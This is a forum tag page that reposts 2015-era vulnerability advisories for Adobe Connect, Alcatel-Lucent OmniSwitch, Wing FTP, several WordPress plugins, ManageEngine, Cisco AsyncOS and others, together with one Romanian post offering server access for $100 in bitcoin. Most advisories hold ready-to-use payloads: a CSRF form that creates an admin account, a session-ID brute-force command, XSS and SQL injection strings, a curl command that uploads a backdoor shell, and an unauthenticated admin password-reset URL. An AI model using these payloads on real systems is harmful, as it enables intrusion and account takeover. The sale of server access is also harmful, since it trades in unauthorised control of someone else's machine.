Search the Community
Showing results for tags 'vendor'.
-
Advisory: Adobe Connect Reflected XSS Author: Stas Volfus (Bugsec Information Security LTD) Vendor URL: http://www.adobe.com/ Status: Vendor Notified ========================== Vulnerability Description ========================== Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS (Cross Site Scripting). The attack allows execution of arbitrary JavaScript in the context of the user’s browser. CVE id: CVE-2015-0343 assigned for this issue. ========================== PoC ========================== The following URL demonstrates the vulnerability: https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=<a href="javascript:alert('XSS')">XSS Link</a> ========================== Disclosure Timeline ========================== 04-NOV-2014 - Vendor notified 01-DEC-2014 - CVE assigned 27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4. ========================== References ========================== http://www.adobe.com/il_en/products/adobeconnect.html https://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.html Source
-
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860 Affected Versions: All Releases: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 AOS 7.3.2.R01 AOS 7.3.3.R01 AOS 7.3.4.R01 AOS 8.1.1.R01 Fixed Versions: - Vulnerability Type: Cross-site request forgery Security Risk: medium Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004 Advisory Status: published CVE: CVE-2015-2805 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts, in this case an HTTP request like the following is sent to the switch: POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 214 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:244.T1:O1=secret &EmWeb_ns:mip:246.T1:O2=-1 &EmWeb_ns:mip:248.T1:O3= &EmWeb_ns:mip:249.T1:O4=1 &EmWeb_ns:mip:250.T1:O5=4 This request creates a user "attacker" with the password "secret". All other parameters are static. All POST parameters can be predicted by attackers This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed. In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following: POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 167 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:4.T1:O1= &EmWeb_ns:mip:5.T1:O2= &EmWeb_ns:mip:6.T1:O3=4294967295 &EmWeb_ns:mip:7.T1:O4=4294967295 This request sets all access privileges for the user "attacker" and is again completely predictable. Proof of Concept ================ Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch: ------------------------------------------------------------------------ <html> <head> <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title> </head> <body> <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> ------------------------------------------------------------------------ Workaround ========== Disable the web interface by executing the following commands: AOS6: no ip service http no ip service secure-http AOS 7/8: ip service http admin-state disable If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface. Fix === Upgrade the firmware to a fixed version, according to the vendor the fixed versions will be available at the end of July 2015. Security Risk ============= If attackers trick a logged-in administrator to visit an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released RedTeam Pentesting GmbH Source
-
Advisory: Alcatel-Lucent OmniSwitch Web Interface Weak Session ID During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. This interface uses easily guessable session IDs, which allows attackers to authenticate as a currently logged-in user and perform administrative tasks. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855 Affected Versions: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 Fixed Versions: AOS 6.6.5.80.R02 AOS 6.6.4.309.R01 Vulnerability Type: Session Management - low identifier entropy Security Risk: high Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-003 Advisory Status: published CVE: CVE-2015-2804 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2804 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. A switch with the example IP 192.0.2.1 is accessible via the following URL: http://192.0.2.1/ A client is then redirected to the following URL: http://192.0.2.1/web/content/index.html For unauthenticated users the URL displays a login form and sets a session cookie with a session ID. A request to the URL with the command line HTTP client cURL shows the Set-Cookie header: $ curl -I http://192.0.2.1/web/content/index.html HTTP/1.1 200 OK Date: Tue, 17 Mar 2015 08:25:42 GMT Server: Agranat-EmWeb/R5_2_4 [...] Set-Cookie: session=sess_11012;PATH=/ The session cookie has the name "session" and its value begins with the string "sess_". By repeatedly requesting the URL with cURL it became obvious that the suffix is always a number between 1 and 32,000. This suggests that there are only about 32,000 possible session IDs, resulting in only 15 bits of entropy. Our tests showed that it was possible to get a throughput of about 50 HTTP requests per second, this means that in order to try every possible session ID an attacker will need at most 11 minutes. On average, the time it takes to find a valid session ID for an active user is even lower. Proof of Concept ================ For an attacker it is very easy to distinguish between a valid and an invalid session ID by looking at the HTTP response size. During our tests, requesting an invalid session ID always returned the login form, which was 3027 bytes in length. With a valid session ID, the management web interface is returned by the webserver and the response is larger. A number of requests in the range of the possible session cookies can be easily executed using wfuzz [0]: ------------------------------------------------------------------------ ./wfuzz.py -z range,1-32000 --hl 3027 -H "Cookie: session=sess_FUZZ" http://192.0.2.1/web/content/index.html ------------------------------------------------------------------------ Workaround ========== Administrators should avoid using the management web interface and use the serial console or administrate the switch over SSH instead. The web interface can be disabled by executing the following commands: no ip service http no ip service secure-http If the web interface is needed, it must be ensured that only authorised persons are able to even connect to the web server. In addition, the HTTP session timeout can be lowered to one minute with the following command: session timeout http 1 Fix === Upgrade the firmware to a fixed version. Security Risk ============= The vulnerability poses a high risk. An attacker can easily authenticate to a switch with the privileges of another user who is currently logged in. The attack is simple and fast. The only precondition is that a user is already using the switch during the attack. Attackers might actively trick administrators into logging in by social engineering. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released References ========== [0] https://github.com/xmendez/wfuzz RedTeam Pentesting GmbH Source
-
- interface
- omniswitch
-
(and 3 more)
Tagged with:
-
Document Title: =============== Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: ============= 2015-04-28 apparitionsec ID (AS-ID): ==================================== AS-WFTP0328 Common Vulnerability Scoring System: ==================================== Overall CVSS Score 8.9 Product: =============================== Wing FTP Server is a Web based administration FTP client that supports following protocols FTP, FTPS, HTTPS, SSH Advisory Information: ============================== Security researcher John Page discovered a CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system. Vulnerability Disclosure Timeline: ================================== March 28, 2015: Vendor Notification March 28, 2015: Vendor Response/Feedback April 19, 2015: Vendor Notification April 28, 2015: Vendor released new patched version 4.4.6 April 28, 2015: Public Disclosure - John Page Affected Product(s): ==================== Wing FTP Server Admin 4.4.5 Product: Wing FTP Server - Admin Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Request Method(s): [+] POST & GET Vulnerable Product: [+] Wing FTP Server Admin 4.4.5 Vulnerable Parameter(s): [+] domain & type Affected Area(s): [+] Server Admin Proof of Concept (POC): ======================= The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction (click). Payload will add arbitrary users to the system. POC: Example http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES] POC: Payload(s) Add arbitrary user to the system: http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E POC XSS: http://localhost:5466/admin_viewstatus.html?domain= POC XSS: http://localhost:5466/admin_event_list.html?type= Solution - Fix & Patch: ======================= Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server) Security Risk: ============== The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9 Credits & Authors: ================== John Page ( hyp3rlinx ) - ISR godz @Apparitionsec Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org Source: http://dl.packetstormsecurity.net/1504-exploits/AS-WFTP0328.txt
-
###################### # Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Video Gallery - Best YouTube and Vimeo Video Gallery Plugin # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense # Date : 2015-04-04 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Video Gallery 2.8 suffers from SQL injection Location file: /contus-video-gallery/hdflvvideoshare.php add_action('wp_ajax_googleadsense' ,'google_adsense'); add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense'); function google_adsense(){ global $wpdb; $vid = $_GET['vid']; $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid); $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id); $google_adsense = unserialize($query); echo $google_adsense['googleadsense_code']; die(); $vid = $_GET['vid']; is not sanitized ###################### # PoC http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[sqli] ###################### # Vulnerability Disclosure Timeline: 2015-04-04: Discovered vulnerability 2015-04-06: Vendor Notification 2015-04-06: Vendor Response/Feedback 2015-04-07: Vendor Send Fix/Patch (same version number) 2015-04-13: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpvideogallery28-sql.txt
-
- ######################
- gallery
-
(and 3 more)
Tagged with:
-
###################### # Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Duplicator - Copy, Move, Clone or Backup your WordPress # Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip # Date : 2015-04-08 # Tested on : Linux / Mozilla Firefox ###################### # Description Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability Location file: /view/actions.php This is the bugged ajax functions wp_ajax_duplicator_package_delete: function duplicator_package_delete() { DUP_Util::CheckPermissions('export'); try { global $wpdb; $json = array(); $post = stripslashes_deep($_POST); $tblName = $wpdb->prefix . 'duplicator_packages'; $postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null; $list = explode(",", $postIDs); $delCount = 0; if ($postIDs != null) { foreach ($list as $id) { $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A); if ($getResult) { $row = $getResult[0]; $nameHash = "{$row['name']}_{$row['hash']}"; $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}"); if ($delResult != 0) { $post['duplicator_delid'] variable is not sanitized A authorized user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin (CSRF) ###################### # PoC http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete POST: duplicator_delid=1 and (select * from (select(sleep(20)))a) ###################### # Vulnerability Disclosure Timeline: 2015-04-08: Discovered vulnerability 2015-04-08: Vendor Notification 2015-04-09: Vendor Response/Feedback 2015-04-10: Vendor Send Fix/Patch 2015-04-10: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpduplicator-sqlxsrf.txt
-
- ######################
- $post[duplicator_delid]
- (and 3 more)
-
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ## Advisory Information Title: FreeBSD 10.x ZFS encryption.key disclosure (CVE-2015-1415) Advisory URL: https://pierrekim.github.io/advisories/CVE-2015-1415.txt.asc Date published: 2015-04-07 Vendors contacted: FreeBSD Release mode: Coordinated release ## Product Description FreeBSD is a UNIX-like operating system. ## Vulnerability Summary FreeBSD 10.x installer supports the installation of FreeBSD 10.x on an encrypted ZFS filesystem by default. When using the encryption system within ZFS during the installation of FreeBSD 10.0 and FreeBSD 10.1, the encryption.key has wrong permissions which allow local users to read this file. Even if the keyfile is passphrase-encrypted, it can present a risk. ## Details By default, the encryption key file is /boot/encryption.key. Instead of being 0600, the permissions are 0644: $ ls -la /boot/encryption.key - -rw-r--r-- 1 root wheel 4096 Feb 17 15:16 /boot/encryption.key $ This file is readable by a local user. ## Vendor Response According to the vendor, a security advisory will be published, describing the problem and the solution. It concerns: - stable/10, 10.1-STABLE - releng/10.1, 10.1-RELEASE-p8 - releng/10.0, 10.0-RELEASE-p18 ## Report Timeline * Mar 01, 2015: Problem found by Pierre Kim * Apr 01, 2015: Vendor is notified of the vulnerability * Apr 01, 2015: Vendor confirms report and indicates a fix is prepared but there will be no security advisory format notification because of the nature of the problem * Apr 02, 2015: Pierre Kim asks a CVE number to the vendor * Apr 02, 2015: Vendor indicates to use CVE-2015-1415 and confirms that a signed notification to the mailing lists will be sent. * Apr 03, 2015: Pierre Kim contacts FreeBSD about the future notification * Apr 04, 2015: Vendor confirms a security advisory will be published next week * Apr 07, 2015: Vendor publishes a security advisory (FreeBSD-SA-15:08) * Apt 07, 2015: This advisory is sent to bugtraq@ ## Credit This vulnerability was found by Pierre Kim (@PierreKimSec). ## References https://www.freebsd.org/doc/handbook/bsdinstall-partitioning.html https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1415 https://www.freebsd.org/security/advisories/FreeBSD-SA-15:08.bsdinstall.asc ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCAAGBQJVJF22AAoJEMQ+Dtp9ky28NDgP/iW9YALiZKLPVhnShFEhFO4C SvSza1s7LJkhtOH8qOGplzTrn8wSV5BNhwzMaIaKpksP5RjoCkynxvAw/OncazPl tsfHM89m7bQ4puyXF3eb6lMkfaIkxoDAXM5R5DFb2Q+3wg4SDygdM7+BQEdqCXDV 2B+ZNGae2CcsqLq04zjskFgY2bwqNMyX3GbbmUJvVI5IXQIS30e1lVIq8zxcK7u0 lKFlVyp+gdyusenPz0lCqR82Pe1IA3tHuNn2zw3/EudT4VhD789/t/0lEWlSyNg7 uiTCqFpQXnpEnvXEez1gZiDuNccIMXXYv0agB+/mYkkoviQPk5jqCwI5rvs+ppFU IH0gAafqS/UIl5+/dhDdIVDA4+r4WWLUxJfFkDy4ThCQHZtZMCsBYk3/RNJBPDUW JiVZWV8LSSHtYfWj7YoiCswuC9FLp6CT9e+/XQUJjpNrwfpeT5KlFOCFUKQXwV6W 5nUJnQhjVfrXVjeRuOvMCInSwG8DWbfyX75QMmJNyV7aPMrS2prRXbOlTLuQUyzP cJkmToeO4XE4COV+jvtC+c39Booy3r8yp3lfHmz1NXffiv6Ua+11vLamUeYOVPew r4TmionPpSeAx3ODhKEKGjW+HIkl9sx3WcSnEBl88Aqd3Zv77G3ok4usFz4PvPnb /hnH/lhpePtv13jyZpXc =pOPH -----END PGP SIGNATURE----- Source
-
###################### # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip # Date : 2015-03-14 # Tested on : Linux BackBox 4.0 / curl 7.35.0 ###################### # Description: Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow. ###################### # Location : http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php ###################### # PoC: curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php # Backdoor Location: http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php ###################### # Vulnerability Disclosure Timeline: 2015-03-14: Discovered vulnerability 2015-04-03: Vendor Notification 2015-04-03: Vendor Response/Feedback 2015-04-04: Vendor Fix/Patch (2.5.3) 2014-04-04: Public Disclosure ##################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpworktheflow252-shell.txt
- 1 reply
-
- ######################
- file
-
(and 3 more)
Tagged with:
-
------------------------------------------------------------------------ Product: Palo Alto Traps Server (formerly Cyvera Endpoint Protection) Vendor: Palo Alto Networks Vulnerable Version(s): 3.1.2.1546 Tested Version: 3.1.2.1546 Advisory Publication: 29 March 2015 Vendor Notification: 17 October 2014 Vulnerability Type: Stored Cross Site Scripting CVE Reference: CVE-2015-2223 Risk Level: High Solution Status: Discovered and Provided: Michael Hendrickx, help AG ------------------------------------------------------------------------ About the product: Palo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this ?trap? to a central server for logging purposes. About the vulnerability: An attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps? admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser. The XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example: <b:Arguments>"C:\\Users\\Michael\\fake.exe" <script> alert("xss"); </script> </b:Arguments> A POC script can be found at the following URL: https://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb ------------------------------------------------------------------------ Solution: The vendor was notified back in October 2014, and a we?ve sent a few follow ups since. Contact the vendor for the patch details. References: [1] help AG middle East: http://www.helpag.com/ [2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html ------------------------------------------------------------------------ Source: http://dl.packetstormsecurity.net/1503-exploits/pats-xss.txt
-
A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well. The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the ‘Administrator’ role (DCAdmin). The following proof of concept URL changes the ‘admin’ user password to ‘admin3’. http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3 The XML response suggests the user modification failed, however a user can perform a successful login with the supplied credentials: <operation> <operationstatus>Failure</operationstatus> <message>Problem while modifying user admin in DC.</message> </operation> Complete control of the application can now be obtained by an unauthorised user. Vulnerability remediation: This vulnerability was fixed in Desktop Central build 90135. Refer to the vendor advisory for product update information and instructions. Vendor advisory: https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.html Disclosure timeline: Vendor notification: 02/02/2015 Follow up with Vendor: 16/02/2015 Fixed released: 18/02/2015 CVE requested: 06/03/2015 CVE assigned: 20/03/2015 Vendor notification: 24/03/2015 Public disclosure: 27/03/2015 Source: http://dl.packetstormsecurity.net/1503-exploits/medc-escalate.txt
-
poti face mai multe domeni in el. lam cumparta dar e mult peste ce stiu sa fac il vand la $100 btc sau pm Total processors: 16 Processor #1 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #2 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #3 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #4 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #5 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #6 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #7 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #8 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #9 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #10 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #11 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #12 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #13 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #14 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #15 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Processor #16 Vendor AuthenticAMD Name AMD Opteron 63xx class CPU Speed 2299.998 MHz Cache 512 KB Memory: 12580028K/13000288K available (3675K kernel code, 499K rwdata, 1448K rodata, 900K init, 584K bss, 420260K reserved)<br>Linux smartcar.websitewelcome.com 3.12.35.1418868451 #1 SMP Wed Dec 17 20:10:32 CST 2014 x86_64 x86_64 x86_64 GNU/Linux<br> total used free shared buffers cached Mem: 12389544 12031768 357776 34812 1168652 6526960 -/+ buffers/cache: 4336156 8053388 Swap: 6143996 478656 5665340 Total: 18533540 12510424 6023116 ROG inca o data admini daca gresesc cu ceva sa fie indulgenti cu mine!!thx
-
Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure Author: Larry W. Cashdollar, @_larry0 Date: 2015-02-17 Download Site: https://rubygems.org/gems/xaviershay-dm-rails Vendor: Martin Gamsjaeger, Dan Kubb Vendor Notified: 2015-02-17 Vendor Contact: notreal [at] rhnh.net Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically. Vulnerability: The problem is with the execute function exposing the user credentials to the process table. Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb: def execute(statement) system( 'mysql', (username.blank? ? '' : "--user=#{username}"), (password.blank? ? '' : "--password=#{password}"), '-e', statement ) end OSVDB:118579 Exploit Code: • $ while (true) do ps -ef |grep [p]assword; done Advisory: http://www.vapid.dhs.org/advisory.php?v=115 Source
-
Cisco Ironport AsyncOS Cross Site Scripting Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-022 Cisco Ironport SMA - AsyncOS 8.4.0-126 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2013-6780 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated Cross-site scripting (XSS), caused by improper validation of user supplied input in the (uploader.swf) Uploader component in Yahoo! versions 2.5.0 through 2.9.0. An attacker is able to inject arbitrary web script or HTML via the allowedDomain parameter. XSS Payload: http(s)://domain.com/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert('XSS');}// References: https://tools.cisco.com/bugsearch/bug/CSCur44409 https://tools.cisco.com/bugsearch/bug/CSCur89626 https://tools.cisco.com/bugsearch/bug/CSCur89624 http://yuilibrary.com/support/20131111-vulnerability/ 